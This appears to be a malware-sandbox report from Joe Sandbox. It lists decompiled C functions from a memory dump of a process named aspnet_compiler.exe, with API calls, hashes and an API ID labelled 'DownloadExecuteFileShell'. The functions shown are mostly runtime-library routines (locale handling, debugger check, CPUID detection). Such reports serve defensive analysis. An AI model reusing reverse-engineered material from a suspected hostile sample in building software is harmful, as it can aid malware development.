                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DownloadExecuteFileShell
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                • API String ID: 2825088817-4294605632
                • Opcode ID: 4dec0716b2cfecefea45f77979f3a6200dc2f4bfe7f5c564d0eb37a83632f986
                • Instruction ID: 0db7feb28fe899170bc1ff05edd6f0e9b1c7309e9c1e85d08ff0b0aee6ae3b0b
                • Opcode Fuzzy Hash: 4dec0716b2cfecefea45f77979f3a6200dc2f4bfe7f5c564d0eb37a83632f986
                • Instruction Fuzzy Hash: 2C61E531A0430157CA14FB75C8A69BE77A99FD1308F10093FF942771D2EE3D8919869B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00450943(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                				signed int _v8;
                				short _v248;
                				signed int _v252;
                				intOrPtr _v256;
                				void* __ebp;
                				signed int _t50;
                				signed int _t58;
                				signed int _t67;
                				signed int _t69;
                				signed int _t72;
                				signed int _t73;
                				intOrPtr _t75;
                				signed int _t76;
                				signed int _t84;
                				signed int _t86;
                				signed int _t87;
                				signed int _t89;
                				intOrPtr _t90;
                				void* _t92;
                				intOrPtr* _t113;
                				void* _t117;
                				intOrPtr* _t119;
                				signed int _t123;
                				signed int _t124;
                				signed int _t125;
                				signed int _t126;
                				void* _t127;
                				signed int* _t129;
                				int _t132;
                				signed int _t133;
                				void* _t134;
                
                				_t50 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t50 ^ _t133;
                				_t92 = E00446A95(__ebx, __ecx, __edx);
                				_t129 =  *(E00446A95(_t92, __ecx, __edx) + 0x34c);
                				_t132 = E00450C6B(_a4);
                				asm("sbb ecx, ecx");
                				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                					_t58 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                					_v252 = _v252 & 0x00000000;
                					__eflags = _t58;
                					if(_t58 != 0) {
                						L18:
                						__eflags = ( *_t129 & 0x00000300) - 0x300;
                						if(( *_t129 & 0x00000300) == 0x300) {
                							L39:
                							__eflags =  !( *_t129 >> 2) & 0x00000001;
                							L40:
                							return E004338BB(_v8 ^ _t133);
                						}
                						asm("sbb ecx, ecx");
                						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                						__eflags = _t67;
                						if(_t67 != 0) {
                							_t69 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                							__eflags = _t69;
                							if(_t69 != 0) {
                								__eflags =  *(_t92 + 0x60);
                								if( *(_t92 + 0x60) != 0) {
                									goto L39;
                								}
                								__eflags =  *(_t92 + 0x5c);
                								if( *(_t92 + 0x5c) == 0) {
                									goto L39;
                								}
                								_t72 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                								__eflags = _t72;
                								if(_t72 != 0) {
                									goto L39;
                								}
                								_push(_t129);
                								_t73 = E00450DC3(0, _t132, 0);
                								__eflags = _t73;
                								if(_t73 == 0) {
                									goto L39;
                								}
                								 *_t129 =  *_t129 | 0x00000100;
                								__eflags = _t129[1];
                								L37:
                								if(__eflags == 0) {
                									_t129[1] = _t132;
                								}
                								goto L39;
                							}
                							 *_t129 =  *_t129 | 0x00000200;
                							_t123 =  *_t129;
                							__eflags =  *(_t92 + 0x60) - _t69;
                							if( *(_t92 + 0x60) == _t69) {
                								__eflags =  *(_t92 + 0x5c) - _t69;
                								if( *(_t92 + 0x5c) == _t69) {
                									goto L23;
                								}
                								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                								_v256 = _t113 + 2;
                								do {
                									_t75 =  *_t113;
                									_t113 = _t113 + 2;
                									__eflags = _t75 - _v252;
                								} while (_t75 != _v252);
                								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                									_t69 = 0;
                									goto L23;
                								}
                								_push(_t129);
                								_t76 = E00450DC3(_t92, _t132, 1);
                								__eflags = _t76;
                								if(_t76 == 0) {
                									goto L39;
                								}
                								 *_t129 =  *_t129 | 0x00000100;
                								_t69 = 0;
                								L24:
                								__eflags = _t129[1] - _t69;
                								goto L37;
                							}
                							L23:
                							_t124 = _t123 | 0x00000100;
                							__eflags = _t124;
                							 *_t129 = _t124;
                							goto L24;
                						}
                						 *_t129 = _t67;
                						L2:
                						goto L40;
                					}
                					asm("sbb eax, eax");
                					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                					__eflags = _t84;
                					if(_t84 == 0) {
                						goto L1;
                					}
                					_t86 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                					_pop(_t117);
                					__eflags = _t86;
                					if(_t86 != 0) {
                						__eflags =  *_t129 & 0x00000002;
                						if(( *_t129 & 0x00000002) != 0) {
                							goto L18;
                						}
                						__eflags =  *(_t92 + 0x5c);
                						if( *(_t92 + 0x5c) == 0) {
                							L14:
                							_t125 =  *_t129;
                							__eflags = _t125 & 0x00000001;
                							if((_t125 & 0x00000001) != 0) {
                								goto L18;
                							}
                							_t87 = E00450D9F(_t132);
                							__eflags = _t87;
                							if(_t87 == 0) {
                								goto L18;
                							}
                							_t126 = _t125 | 0x00000001;
                							__eflags = _t126;
                							 *_t129 = _t126;
                							goto L17;
                						}
                						_t89 = E0044008E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                						_t134 = _t134 + 0xc;
                						__eflags = _t89;
                						if(_t89 != 0) {
                							goto L14;
                						}
                						 *_t129 =  *_t129 | 0x00000002;
                						__eflags =  *_t129;
                						_t129[2] = _t132;
                						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                						_t127 = _t119 + 2;
                						do {
                							_t90 =  *_t119;
                							_t119 = _t119 + 2;
                							__eflags = _t90 - _v252;
                						} while (_t90 != _v252);
                						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                							_t129[1] = _t132;
                						}
                					} else {
                						 *_t129 =  *_t129 | 0x00000304;
                						_t129[1] = _t132;
                						L17:
                						_t129[2] = _t132;
                					}
                					goto L18;
                				}
                				L1:
                				 *_t129 =  *_t129 & 0x00000000;
                				goto L2;
                			}



































                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450997
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004509E8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450AA8
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorInfoLastLocale$_free$_abort
                • String ID:
                • API String ID: 2829624132-0
                • Opcode ID: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                • Instruction ID: da7bcabd89bfc395045dfa7eb9e966dc36f5abb2093a3d853536695ab6a7a704
                • Opcode Fuzzy Hash: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                • Instruction Fuzzy Hash: E361A3795002079FEB289F64CC82B7B77A8EF14306F1081ABED05C6246E778ED49CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E0043A3F1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v0;
                				signed int _v8;
                				intOrPtr _v524;
                				intOrPtr _v528;
                				void* _v532;
                				intOrPtr _v536;
                				char _v540;
                				intOrPtr _v544;
                				intOrPtr _v548;
                				intOrPtr _v552;
                				intOrPtr _v556;
                				intOrPtr _v560;
                				intOrPtr _v564;
                				intOrPtr _v568;
                				intOrPtr _v572;
                				intOrPtr _v576;
                				intOrPtr _v580;
                				intOrPtr _v584;
                				char _v724;
                				intOrPtr _v792;
                				intOrPtr _v800;
                				char _v804;
                				struct _EXCEPTION_POINTERS _v812;
                				signed int _t40;
                				char* _t47;
                				char* _t49;
                				intOrPtr _t61;
                				intOrPtr _t62;
                				intOrPtr _t66;
                				intOrPtr _t67;
                				int _t68;
                				intOrPtr _t69;
                				signed int _t70;
                
                				_t69 = __esi;
                				_t67 = __edi;
                				_t66 = __edx;
                				_t61 = __ebx;
                				_t40 =  *0x46f00c; // 0xd60a1515
                				_t41 = _t40 ^ _t70;
                				_v8 = _t40 ^ _t70;
                				if(_a4 != 0xffffffff) {
                					_push(_a4);
                					E0043349F(_t41);
                					_pop(_t62);
                				}
                				E00435760(_t67,  &_v804, 0, 0x50);
                				E00435760(_t67,  &_v724, 0, 0x2cc);
                				_v812.ExceptionRecord =  &_v804;
                				_t47 =  &_v724;
                				_v812.ContextRecord = _t47;
                				_v548 = _t47;
                				_v552 = _t62;
                				_v556 = _t66;
                				_v560 = _t61;
                				_v564 = _t69;
                				_v568 = _t67;
                				_v524 = ss;
                				_v536 = cs;
                				_v572 = ds;
                				_v576 = es;
                				_v580 = fs;
                				_v584 = gs;
                				asm("pushfd");
                				_pop( *_t22);
                				_v540 = _v0;
                				_t49 =  &_v0;
                				_v528 = _t49;
                				_v724 = 0x10001;
                				_v544 =  *((intOrPtr*)(_t49 - 4));
                				_v804 = _a8;
                				_v800 = _a12;
                				_v792 = _v0;
                				_t68 = IsDebuggerPresent();
                				SetUnhandledExceptionFilter(0);
                				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                					_push(_a4);
                					E0043349F(_t57);
                				}
                				return E004338BB(_v8 ^ _t70);
                			}





































                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0043A4E9
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043A4F3
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A500
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                • Instruction ID: 1402d3c3d6381031a2721457eed26b4c58248f3cce99d36bfdd4232644ff5fa2
                • Opcode Fuzzy Hash: 544a3ea7fff3e3fd303db8147e01e1c016785345ebc81d263e55c6614bc6e9fb
                • Instruction Fuzzy Hash: 3031D37590132CABCB21DF24D88879DBBB8AF08315F5052EAE81CA7251E7749B858F49
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00441B85(int _a4) {
                				void* _t14;
                				void* _t16;
                
                				if(E00447549(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                					TerminateProcess(GetCurrentProcess(), _a4);
                				}
                				E00441C0A(_t14, _t16, _a4);
                				ExitProcess(_a4);
                			}






                APIs
                • GetCurrentProcess.KERNEL32(?,?,00441B5B,?), ref: 00441BA6
                • TerminateProcess.KERNEL32(00000000,?,00441B5B,?), ref: 00441BAD
                • ExitProcess.KERNEL32 ref: 00441BBF
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                • Instruction ID: 3981a427e79a20866ec782955a96dc1f6ef246171a4a80411b7f48c71aa59ebf
                • Opcode Fuzzy Hash: ff5056bf36bedea9d2f3910c34989f8e11af6edf1d36431677989e12fa233f4a
                • Instruction Fuzzy Hash: 18E0BF31005348ABDF116F65EE49E593B69EB44356F0040A5F8094A632DB39ED82CA88
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0043354D(intOrPtr __edx) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed char _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _t59;
                				signed int _t62;
                				signed int _t63;
                				intOrPtr _t65;
                				signed int _t66;
                				signed int _t68;
                				intOrPtr _t73;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t84;
                				intOrPtr* _t86;
                				signed int _t91;
                				signed int _t94;
                
                				_t84 = __edx;
                				 *0x46fd1c =  *0x46fd1c & 0x00000000;
                				 *0x46f010 =  *0x46f010 | 1;
                				if(IsProcessorFeaturePresent(0xa) == 0) {
                					L20:
                					return 0;
                				}
                				_v24 = _v24 & 0x00000000;
                				 *0x46f010 =  *0x46f010 | 0x00000002;
                				 *0x46fd1c = 1;
                				_t86 =  &_v48;
                				_push(1);
                				asm("cpuid");
                				_pop(_t73);
                				 *_t86 = 0;
                				 *((intOrPtr*)(_t86 + 4)) = 1;
                				 *((intOrPtr*)(_t86 + 8)) = 0;
                				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                				_v16 = _v48;
                				_v8 = _v36 ^ 0x49656e69;
                				_v12 = _v40 ^ 0x6c65746e;
                				_push(1);
                				asm("cpuid");
                				_t75 =  &_v48;
                				 *_t75 = 1;
                				 *((intOrPtr*)(_t75 + 4)) = _t73;
                				 *((intOrPtr*)(_t75 + 8)) = 0;
                				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                					L9:
                					_t91 =  *0x46fd20; // 0x2
                					L10:
                					_v32 = _v36;
                					_t59 = _v40;
                					_v8 = _t59;
                					_v28 = _t59;
                					if(_v16 >= 7) {
                						_t65 = 7;
                						_push(_t75);
                						asm("cpuid");
                						_t77 =  &_v48;
                						 *_t77 = _t65;
                						 *((intOrPtr*)(_t77 + 4)) = _t75;
                						 *((intOrPtr*)(_t77 + 8)) = 0;
                						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                						_t66 = _v44;
                						_v24 = _t66;
                						_t59 = _v8;
                						if((_t66 & 0x00000200) != 0) {
                							 *0x46fd20 = _t91 | 0x00000002;
                						}
                					}
                					if((_t59 & 0x00100000) != 0) {
                						 *0x46f010 =  *0x46f010 | 0x00000004;
                						 *0x46fd1c = 2;
                						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                							asm("xgetbv");
                							_v20 = _t59;
                							_v16 = _t84;
                							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                								_t62 =  *0x46f010; // 0x2f
                								_t63 = _t62 | 0x00000008;
                								 *0x46fd1c = 3;
                								 *0x46f010 = _t63;
                								if((_v24 & 0x00000020) != 0) {
                									 *0x46fd1c = 5;
                									 *0x46f010 = _t63 | 0x00000020;
                								}
                							}
                						}
                					}
                					goto L20;
                				}
                				_t68 = _v48 & 0x0fff3ff0;
                				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                					_t94 =  *0x46fd20; // 0x2
                					_t91 = _t94 | 0x00000001;
                					 *0x46fd20 = _t91;
                					goto L10;
                				} else {
                					goto L9;
                				}
                			}




























                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00433566
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID: P@
                • API String ID: 2325560087-676759640
                • Opcode ID: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                • Instruction ID: a2294149a4fe3e39a77fcac35e687f8d246c97dff2426aff95b936701e7ffbe2
                • Opcode Fuzzy Hash: 10d0db48ad41214a457a840dc0a8d4848e401eea1aef23fd8bf6dc7a295d9120
                • Instruction Fuzzy Hash: 02516B71D002089FEB24CFA9E98669EBBF4FB08315F14917AD455E7350E374AA04CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E0044D0F9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				intOrPtr* _v32;
                				CHAR* _v36;
                				signed int _v48;
                				char _v286;
                				signed int _v287;
                				struct _WIN32_FIND_DATAA _v332;
                				intOrPtr* _v336;
                				signed int _v340;
                				signed int _v344;
                				intOrPtr _v372;
                				signed int _t35;
                				signed int _t40;
                				signed int _t43;
                				intOrPtr _t45;
                				signed char _t47;
                				intOrPtr* _t55;
                				union _FINDEX_INFO_LEVELS _t57;
                				signed int _t62;
                				signed int _t65;
                				void* _t72;
                				void* _t74;
                				signed int _t75;
                				void* _t78;
                				CHAR* _t79;
                				intOrPtr* _t83;
                				intOrPtr _t85;
                				void* _t87;
                				intOrPtr* _t88;
                				signed int _t92;
                				signed int _t96;
                				void* _t101;
                				intOrPtr _t102;
                				signed int _t105;
                				union _FINDEX_INFO_LEVELS _t106;
                				void* _t111;
                				intOrPtr _t112;
                				void* _t113;
                				signed int _t118;
                				void* _t119;
                				signed int _t120;
                				void* _t121;
                				void* _t122;
                
                				_push(__ecx);
                				_t83 = _a4;
                				_t2 = _t83 + 1; // 0x1
                				_t101 = _t2;
                				do {
                					_t35 =  *_t83;
                					_t83 = _t83 + 1;
                				} while (_t35 != 0);
                				_push(__edi);
                				_t105 = _a12;
                				_t85 = _t83 - _t101 + 1;
                				_v8 = _t85;
                				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                					_push(__ebx);
                					_push(__esi);
                					_t5 = _t105 + 1; // 0x1
                					_t78 = _t5 + _t85;
                					_t111 = E004443F4(_t85, _t78, 1);
                					_pop(_t87);
                					__eflags = _t105;
                					if(_t105 == 0) {
                						L6:
                						_push(_v8);
                						_t78 = _t78 - _t105;
                						_t40 = E00440303(_t87, _t111 + _t105, _t78, _a4);
                						_t120 = _t119 + 0x10;
                						__eflags = _t40;
                						if(__eflags != 0) {
                							goto L9;
                						} else {
                							_t72 = E0044D338(_a16, __eflags, _t111);
                							E00445002(0);
                							_t74 = _t72;
                							goto L8;
                						}
                					} else {
                						_push(_t105);
                						_t75 = E00440303(_t87, _t111, _t78, _a8);
                						_t120 = _t119 + 0x10;
                						__eflags = _t75;
                						if(_t75 != 0) {
                							L9:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E0043A5E8();
                							asm("int3");
                							_t118 = _t120;
                							_t121 = _t120 - 0x150;
                							_t43 =  *0x46f00c; // 0xd60a1515
                							_v48 = _t43 ^ _t118;
                							_t88 = _v32;
                							_push(_t78);
                							_t79 = _v36;
                							_push(_t111);
                							_t112 = _v332.cAlternateFileName;
                							_push(_t105);
                							_v372 = _t112;
                							while(1) {
                								__eflags = _t88 - _t79;
                								if(_t88 == _t79) {
                									break;
                								}
                								_t45 =  *_t88;
                								__eflags = _t45 - 0x2f;
                								if(_t45 != 0x2f) {
                									__eflags = _t45 - 0x5c;
                									if(_t45 != 0x5c) {
                										__eflags = _t45 - 0x3a;
                										if(_t45 != 0x3a) {
                											_t88 = E00454B80(_t79, _t88);
                											continue;
                										}
                									}
                								}
                								break;
                							}
                							_t102 =  *_t88;
                							__eflags = _t102 - 0x3a;
                							if(_t102 != 0x3a) {
                								L19:
                								_t106 = 0;
                								__eflags = _t102 - 0x2f;
                								if(_t102 == 0x2f) {
                									L23:
                									_t47 = 1;
                									__eflags = 1;
                								} else {
                									__eflags = _t102 - 0x5c;
                									if(_t102 == 0x5c) {
                										goto L23;
                									} else {
                										__eflags = _t102 - 0x3a;
                										if(_t102 == 0x3a) {
                											goto L23;
                										} else {
                											_t47 = 0;
                										}
                									}
                								}
                								_t90 = _t88 - _t79 + 1;
                								asm("sbb eax, eax");
                								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                								E00435760(_t106,  &_v332, _t106, 0x140);
                								_t122 = _t121 + 0xc;
                								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                								_t55 = _v336;
                								__eflags = _t113 - 0xffffffff;
                								if(_t113 != 0xffffffff) {
                									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                									__eflags = _t92;
                									_t93 = _t92 >> 2;
                									_v344 = _t92 >> 2;
                									do {
                										__eflags = _v332.cFileName - 0x2e;
                										if(_v332.cFileName != 0x2e) {
                											L36:
                											_push(_t55);
                											_t57 = E0044D0F9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                											_t122 = _t122 + 0x10;
                											__eflags = _t57;
                											if(_t57 != 0) {
                												goto L26;
                											} else {
                												goto L37;
                											}
                										} else {
                											_t93 = _v287;
                											__eflags = _t93;
                											if(_t93 == 0) {
                												goto L37;
                											} else {
                												__eflags = _t93 - 0x2e;
                												if(_t93 != 0x2e) {
                													goto L36;
                												} else {
                													__eflags = _v286;
                													if(_v286 == 0) {
                														goto L37;
                													} else {
                														goto L36;
                													}
                												}
                											}
                										}
                										goto L40;
                										L37:
                										_t62 = FindNextFileA(_t113,  &_v332);
                										__eflags = _t62;
                										_t55 = _v336;
                									} while (_t62 != 0);
                									_t103 =  *_t55;
                									_t96 = _v344;
                									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                									__eflags = _t96 - _t65;
                									if(_t96 != _t65) {
                										E0043F8D0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044CF51);
                									}
                								} else {
                									_push(_t55);
                									_t57 = E0044D0F9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                									L26:
                									_t106 = _t57;
                								}
                								__eflags = _t113 - 0xffffffff;
                								if(_t113 != 0xffffffff) {
                									FindClose(_t113);
                								}
                							} else {
                								__eflags = _t88 -  &(_t79[1]);
                								if(_t88 ==  &(_t79[1])) {
                									goto L19;
                								} else {
                									_push(_t112);
                									E0044D0F9(_t79, _t88, 0, _t112, _t79, 0, 0);
                								}
                							}
                							__eflags = _v12 ^ _t118;
                							return E004338BB(_v12 ^ _t118);
                						} else {
                							goto L6;
                						}
                					}
                				} else {
                					_t74 = 0xc;
                					L8:
                					return _t74;
                				}
                				L40:
                			}
















































                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                • Instruction ID: a605d271e407c9958f5ebfb9e98191da8a3e066373b5453ef71e7620c58a5f30
                • Opcode Fuzzy Hash: eb39091a66b90e585f9b8de1188895b1ce3c987d0d7c23a11321f6f6f58edeb2
                • Instruction Fuzzy Hash: CA313571D00209AFEB249E79CC84EEB7BBDEB86308F1401AEF819D3251E6349D408B64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E0045081B(void* __ecx, void* __edx, signed int* _a4) {
                				void* __ebx;
                				void* __ebp;
                				intOrPtr _t26;
                				intOrPtr _t29;
                				signed int _t32;
                				signed char _t33;
                				signed char _t34;
                				void* _t36;
                				intOrPtr* _t39;
                				intOrPtr* _t42;
                				signed int _t48;
                				void* _t51;
                				void* _t52;
                				signed int* _t53;
                				void* _t54;
                				signed int _t62;
                
                				_t54 = E00446A95(_t36, __ecx, __edx);
                				_t48 = 2;
                				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                				_t51 = _t39 + 2;
                				do {
                					_t26 =  *_t39;
                					_t39 = _t39 + _t48;
                				} while (_t26 != 0);
                				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                				_t52 = _t42 + 2;
                				do {
                					_t29 =  *_t42;
                					_t42 = _t42 + _t48;
                				} while (_t29 != 0);
                				_t53 = _a4;
                				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                				_t53[1] = 0;
                				if( *(_t54 + 0x60) == 0) {
                					_t48 = E00450917( *((intOrPtr*)(_t54 + 0x50)));
                				}
                				 *(_t54 + 0x5c) = _t48;
                				_t32 = EnumSystemLocalesW(E00450943, 1);
                				_t62 =  *_t53 & 0x00000007;
                				asm("bt ecx, 0x9");
                				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                				asm("bt ecx, 0x8");
                				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                					 *_t53 = 0;
                					return _t34;
                				}
                				return _t34;
                			}




















                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • EnumSystemLocalesW.KERNEL32(00450943,00000001,00000000,?,m3D,?,00450F70,00000000,?,?,?), ref: 0045088D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID: m3D
                • API String ID: 1084509184-982802904
                • Opcode ID: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                • Instruction ID: 15c25865bd57dd9ed052f6de1c9d4bc0c6d7c90143c64c40a76a96693f8e609e
                • Opcode Fuzzy Hash: d13ce46db01857b44c754fc5ec7763bcb35d9ccf5c388861a977e99f0991b4a0
                • Instruction Fuzzy Hash: 3E118C3B2007019FEB18AF39C8916BAB791FF80319B14883EED4647701D775B906C780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004508B6(void* __ecx, void* __edx, signed char* _a4) {
                				void* __ebx;
                				void* __ebp;
                				intOrPtr _t11;
                				signed int _t13;
                				signed char* _t15;
                				void* _t17;
                				intOrPtr* _t20;
                				intOrPtr _t25;
                				void* _t26;
                				void* _t27;
                
                				_t27 = E00446A95(_t17, __ecx, __edx);
                				_t25 = 2;
                				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                				_t26 = _t20 + 2;
                				do {
                					_t11 =  *_t20;
                					_t20 = _t20 + _t25;
                				} while (_t11 != 0);
                				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                				 *(_t27 + 0x60) = _t13;
                				if(_t13 == 0) {
                					_t25 = E00450917( *((intOrPtr*)(_t27 + 0x50)));
                				}
                				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                				EnumSystemLocalesW(E00450B93, 1);
                				_t15 = _a4;
                				if(( *_t15 & 0x00000004) == 0) {
                					 *_t15 = 0;
                					return _t15;
                				}
                				return _t15;
                			}














                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
